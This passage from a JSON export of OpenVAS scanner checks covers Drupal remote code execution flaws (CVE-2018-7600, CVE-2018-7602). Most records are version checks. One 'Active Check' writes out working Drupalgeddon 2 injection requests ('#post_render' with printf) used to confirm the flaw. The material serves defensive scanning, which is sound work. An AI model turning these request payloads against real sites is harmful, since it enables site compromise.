script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!drupalPort = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:drupalPort, version_regex:\"^([0-9.]+)\", exit_no_version:TRUE)) {\n exit(0);\n}\n\ndrupalVer = infos['version'];\npath = infos['location'];\n\nif(drupalVer =~ \"^(6\\.)\") {\n fix = \"Drupal 6 is End of Life.please contact a D6LTS vendor\";\n}\n\nif(drupalVer =~ \"^(8\\.2)\" || drupalVer == \"8.5.0\") {\n fix = \"Upgrade to 8.5.1\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"8.3.0\", test_version2:\"8.3.8\")) {\n fix = \"Upgrade to 8.3.9\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"8.4.0\", test_version2:\"8.4.5\")) {\n fix = \"Upgrade to 8.4.6\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"7.0\", test_version2:\"7.57\")) {\n fix = \"Upgrade to 7.58\";\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:drupalVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:drupalPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:06:51", "description": "Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for drupal7 (DLA-1325-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891325", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891325", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891325\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_name(\"Debian LTS: Security Advisory for drupal7 (DLA-1325-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 00:00:00 +0200 (Thu, 29 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_tag(name:\"summary\", value:\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u18\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:32", "description": "A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4156-1 (drupal7 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4156-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704156\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_name(\"Debian Security Advisory DSA 4156-1 (drupal7 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 00:00:00 +0200 (Thu, 29 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4156.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB[89]\");\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/drupal7\");\n script_tag(name:\"summary\", value:\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.52-2+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.32-1+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-16T15:52:02", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-14T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310108438", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108438", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:drupal:drupal\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108438\");\n script_version(\"2020-04-15T09:02:26+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 09:02:26 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-04-14 13:29:22 +0200 (Sat, 14 Apr 2018)\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\");\n script_mandatory_keys(\"drupal/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9, 8.4.6, 8.5.1,\n 7.58 or later. Please see the refereced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\ncheck = rand_str( length:16 );\n# nb: URL rewriting on/off\nurls = make_list( dir + \"/user/register\", dir + \"/?q=user/register\" );\n\nforeach url( urls ) {\n\n url = url + \"?element_parents=account%2Fmail%2F%23value&ajax_form=1&_wrapper_format=drupal_ajax\";\n data = \"form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]=\" + check;\n req = http_post_put_req( port:port, url:url, data:data,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n # neNWIz2mlhti89hQ[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"16\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n if( egrep( string:res, pattern:\"^\" + check + \"\\[\\{\" ) ) {\n\n info['\"HTTP POST\" body'] = data;\n info['URL'] = http_report_vuln_url( port:port, url:url, url_only:TRUE );\n\n report = 'By doing the following request:\\n\\n';\n report += text_format_table( array:info ) + '\\n\\n';\n report += 'it was possible to execute the \"printf\" command.';\n report += '\\n\\nResult:\\n\\n' + res;\n\n expert_info = 'Request:\\n'+ req + 'Response:\\n' + res + '\\n';\n security_message( port:port, data:report, expert_info:expert_info );\n exit( 0 );\n }\n}\n\n# Drupal 7\n# This needs 2 requests (see e.g. https://github.com/FireFart/CVE-2018-7600/blob/master/poc.py)\nurl1 = dir + \"/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=printf&name%5B%23markup%5D=\"+ check +\n \"&name%5B%23typ\";\ndata1 = \"form_id=user_pass&_triggering_element_name=name\";\n\nreq = http_post_put_req( port:port, url:url1, data:data1,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n\nbuild_id = eregmatch( pattern:'<input type=\"hidden\" name=\"form_build_id\" value=\"([^\"]+)\" />', string:res );\nif( ! isnull( build_id[1] ) ) {\n url2 = dir + \"/?q=file%2Fajax%2Fname%2F%23value%2F\" + build_id[1];\n data2 = \"form_build_id=\" + build_id[1];\n req = http_post_put_req( port:port, url:url2, data:data2,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n\n # wz8rLLg_3Uie91Rg[{\"command\":\"settings\",\"settings\":{\"basePath\":\"...\n if( egrep( string:res, pattern:\"^\" + check + \"\\[\\{\" ) ) {\n\n info['Req 1: \"HTTP POST\" body'] = data1;\n info['Req 1: URL'] = http_report_vuln_url( port:port, url:url1, url_only:TRUE );\n info['Req 2: \"HTTP POST\" body'] = data2;\n info['Req 2: URL'] = http_report_vuln_url( port:port, url:url2, url_only:TRUE );\n\n report = 'By doing the following subsequent requests:\\n\\n';\n report += text_format_table( array:info ) + '\\n\\n';\n report += 'it was possible to execute the \"printf\" command to return the data \"' + check + '\".';\n report += '\\n\\nResult:\\n\\n' + res;\n\n expert_info = 'Request:\\n'+ req + 'Response:\\n' + res + '\\n';\n security_message( port:port, data:report, expert_info:expert_info );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141028", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141028\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141029", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141029\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-b9ad458866", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874421", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_b9ad458866_drupal7_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-b9ad458866\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874421\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:21 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-b9ad458866\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b9ad458866\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GYT7R43FLLEEG4N2QS3FDGZ3NNHOL3HL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-03-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-6a0717dc9a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875500", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# 